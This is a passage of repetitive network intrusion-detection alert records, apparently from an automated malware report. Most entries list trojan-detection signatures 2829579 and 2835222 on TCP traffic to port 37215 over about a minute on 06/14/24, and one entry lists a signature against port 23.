                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089724
                SID:2829579
                Source Port:36982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012466
                SID:2835222
                Source Port:36112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880002
                SID:2829579
                Source Port:37604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803505
                SID:2835222
                Source Port:45208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700431
                SID:2829579
                Source Port:60846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501788
                SID:2829579
                Source Port:33754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661972
                SID:2829579
                Source Port:46970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686836
                SID:2835222
                Source Port:43350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847506
                SID:2829579
                Source Port:49170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850403
                SID:2835222
                Source Port:44226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984650
                SID:2829579
                Source Port:54320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186362
                SID:2835222
                Source Port:56104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669404
                SID:2829579
                Source Port:49330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013803
                SID:2835222
                Source Port:37852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616887
                SID:2835222
                Source Port:35872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989589
                SID:2829579
                Source Port:57816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705199
                SID:2835222
                Source Port:54136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704091
                SID:2829579
                Source Port:54138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452317
                SID:2835222
                Source Port:35978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074494
                SID:2829579
                Source Port:48010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.613964
                SID:2829579
                Source Port:59186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917652
                SID:2835222
                Source Port:42680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342221
                SID:2835222
                Source Port:48526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661227
                SID:2835222
                Source Port:48308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074628
                SID:2829579
                Source Port:50082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342432
                SID:2835222
                Source Port:47184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469735
                SID:2835222
                Source Port:60764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519173
                SID:2829579
                Source Port:58398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520543
                SID:2835222
                Source Port:44388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030352
                SID:2829579
                Source Port:49078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969397
                SID:2829579
                Source Port:48408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846513
                SID:2835222
                Source Port:41334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519042
                SID:2835222
                Source Port:45934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736440
                SID:2829579
                Source Port:35088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181126
                SID:2829579
                Source Port:48230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502596
                SID:2829579
                Source Port:33574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001134
                SID:2829579
                Source Port:38524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322002
                SID:2829579
                Source Port:36312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581581
                SID:2829579
                Source Port:40518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.278006
                SID:2835222
                Source Port:57646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647314
                SID:2829579
                Source Port:49780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766144
                SID:2835222
                Source Port:42198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132863
                SID:2835222
                Source Port:60280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703282
                SID:2829579
                Source Port:55834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702010
                SID:2835222
                Source Port:52058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277428
                SID:2829579
                Source Port:51500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295069
                SID:2829579
                Source Port:46412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244902
                SID:2829579
                Source Port:35820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073715
                SID:2835222
                Source Port:44506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227671
                SID:2829579
                Source Port:56806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805750
                SID:2829579
                Source Port:42212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703025
                SID:2835222
                Source Port:56628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148029
                SID:2835222
                Source Port:33358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671160
                SID:2835222
                Source Port:52412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504656
                SID:2835222
                Source Port:39656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914374
                SID:2829579
                Source Port:37544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016630
                SID:2835222
                Source Port:54244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763355
                SID:2835222
                Source Port:42510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422307
                SID:2829579
                Source Port:53778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675302
                SID:2835222
                Source Port:54622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811740
                SID:2829579
                Source Port:55260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028320
                SID:2835222
                Source Port:49602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830071
                SID:2829579
                Source Port:48414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715432
                SID:2829579
                Source Port:42094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253610
                SID:2835222
                Source Port:55218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671484
                SID:2835222
                Source Port:54596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057594
                SID:2835222
                Source Port:59872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517537
                SID:2835222
                Source Port:51204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933581
                SID:2835222
                Source Port:32784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682982
                SID:2835222
                Source Port:44120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724673
                SID:2829579
                Source Port:55734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472129
                SID:2829579
                Source Port:48462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686539
                SID:2835222
                Source Port:43506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792931
                SID:2829579
                Source Port:54604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689360
                SID:2829579
                Source Port:50600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520257
                SID:2835222
                Source Port:50790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878669
                SID:2829579
                Source Port:46198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917739
                SID:2835222
                Source Port:60180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913946
                SID:2835222
                Source Port:48836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198241
                SID:2829579
                Source Port:42864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203226
                SID:2829579
                Source Port:40234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275535
                SID:2829579
                Source Port:48764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182486
                SID:2835222
                Source Port:60020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024386
                SID:2835222
                Source Port:55530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409223
                SID:2835222
                Source Port:47090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645783
                SID:2835222
                Source Port:54490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718129
                SID:2835222
                Source Port:39984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777669
                SID:2835222
                Source Port:52490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663231
                SID:2829579
                Source Port:46586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229717
                SID:2829579
                Source Port:37558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805651
                SID:2829579
                Source Port:46944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625410
                SID:2829579
                Source Port:40142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149186
                SID:2829579
                Source Port:49604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763789
                SID:2835222
                Source Port:46354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199958
                SID:2829579
                Source Port:56680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473646
                SID:2835222
                Source Port:43212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943413
                SID:2829579
                Source Port:59490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131363
                SID:2829579
                Source Port:40890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027371
                SID:2829579
                Source Port:38902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150187
                SID:2835222
                Source Port:55846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734854
                SID:2829579
                Source Port:46362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012702
                SID:2829579
                Source Port:46874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827573
                SID:2829579
                Source Port:51798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614567
                SID:2829579
                Source Port:52814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718897
                SID:2829579
                Source Port:56466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.162443
                SID:2829579
                Source Port:36566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776016
                SID:2829579
                Source Port:58448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568223
                SID:2829579
                Source Port:55838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682833
                SID:2829579
                Source Port:40936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812067
                SID:2835222
                Source Port:52442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367083
                SID:2835222
                Source Port:60814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717920
                SID:2829579
                Source Port:42778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160255
                SID:2829579
                Source Port:45764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274724
                SID:2829579
                Source Port:35110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858603
                SID:2829579
                Source Port:34808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135247
                SID:2835222
                Source Port:38744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988908
                SID:2835222
                Source Port:36858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979274
                SID:2835222
                Source Port:51144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968549
                SID:2829579
                Source Port:60498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012536
                SID:2829579
                Source Port:49462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828593
                SID:2835222
                Source Port:35402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678225
                SID:2829579
                Source Port:55506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702055
                SID:2829579
                Source Port:34588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273233
                SID:2829579
                Source Port:55800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115780
                SID:2835222
                Source Port:54004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074816
                SID:2835222
                Source Port:58334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.387264
                SID:2835222
                Source Port:50206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687771
                SID:2829579
                Source Port:54780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967714
                SID:2835222
                Source Port:40216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808348
                SID:2829579
                Source Port:45432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687123
                SID:2835222
                Source Port:48354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762650
                SID:2829579
                Source Port:45968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453432
                SID:2835222
                Source Port:35882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978347
                SID:2829579
                Source Port:51338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899963
                SID:2829579
                Source Port:34348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616730
                SID:2829579
                Source Port:58378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325616
                SID:2835222
                Source Port:37088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669715
                SID:2829579
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182014
                SID:2835222
                Source Port:38358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734199
                SID:2829579
                Source Port:60220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932638
                SID:2835222
                Source Port:44478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131136
                SID:2835222
                Source Port:35358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942252
                SID:2829579
                Source Port:39572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646041
                SID:2829579
                Source Port:53680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728696
                SID:2829579
                Source Port:34720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776806
                SID:2835222
                Source Port:60840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861229
                SID:2835222
                Source Port:34982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057191
                SID:2829579
                Source Port:53274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791628
                SID:2829579
                Source Port:48440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760895
                SID:2829579
                Source Port:38320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337004
                SID:2829579
                Source Port:35542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944335
                SID:2829579
                Source Port:41768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827779
                SID:2829579
                Source Port:50098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229804
                SID:2835222
                Source Port:53152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984181
                SID:2835222
                Source Port:59320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253182
                SID:2829579
                Source Port:55290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968216
                SID:2829579
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027845
                SID:2829579
                Source Port:36276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182648
                SID:2835222
                Source Port:60076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134413
                SID:2829579
                Source Port:35672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848630
                SID:2829579
                Source Port:39634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688795
                SID:2829579
                Source Port:42306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671920
                SID:2835222
                Source Port:45202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878831
                SID:2835222
                Source Port:41666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245292
                SID:2835222
                Source Port:57806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185691
                SID:2829579
                Source Port:47376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625094
                SID:2835222
                Source Port:37836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325089
                SID:2835222
                Source Port:53974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013667
                SID:2835222
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807305
                SID:2829579
                Source Port:54610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941790
                SID:2835222
                Source Port:40980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679444
                SID:2835222
                Source Port:49788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.907697
                SID:2840515
                Source Port:58432
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828512
                SID:2835222
                Source Port:35722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.320972
                SID:2829579
                Source Port:42766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424417
                SID:2829579
                Source Port:38940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734668
                SID:2829579
                Source Port:59602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519308
                SID:2835222
                Source Port:59876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133072
                SID:2829579
                Source Port:58872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779871
                SID:2829579
                Source Port:51552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662755
                SID:2829579
                Source Port:47582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181888
                SID:2835222
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776719
                SID:2835222
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683805
                SID:2835222
                Source Port:52564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966358
                SID:2835222
                Source Port:41830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505082
                SID:2835222
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.252882
                SID:2835222
                Source Port:44620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182874
                SID:2835222
                Source Port:46164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131575
                SID:2835222
                Source Port:38820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941273
                SID:2835222
                Source Port:46848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813351
                SID:2835222
                Source Port:43878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000724
                SID:2829579
                Source Port:57568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028940
                SID:2829579
                Source Port:54820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368623
                SID:2835222
                Source Port:56054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704286
                SID:2835222
                Source Port:34644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689437
                SID:2835222
                Source Port:50536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660692
                SID:2835222
                Source Port:46224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
